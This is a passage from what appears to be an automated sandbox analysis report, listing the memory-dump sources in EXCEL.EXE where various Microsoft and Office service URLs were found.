    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonsP
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: EXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886851258.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829883976.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.842980218.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.982109381.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843787373.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975647498.0000000012A2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847529633.0000000012A13000.00000004.00000001.sdmpString found in binary or memory: https://pages.store
    Source: EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.offi
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/query7
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxWW
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: EXCEL.EXE, 00000000.00000003.830019835.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887114579.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792860605.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844384510.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.976497308.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.846187037.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847870583.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.831076747.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728160281.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843428711.000000000F1AC000.00000004.00000001.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions-lT
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: EXCEL.EXE, 00000000.00000002.981591144.00000000128C3000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json$
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControlA
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsone
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsY
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://roaming.edog.
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://settings.outlook.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workO
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workU
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workp
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://staging.cortana.ai
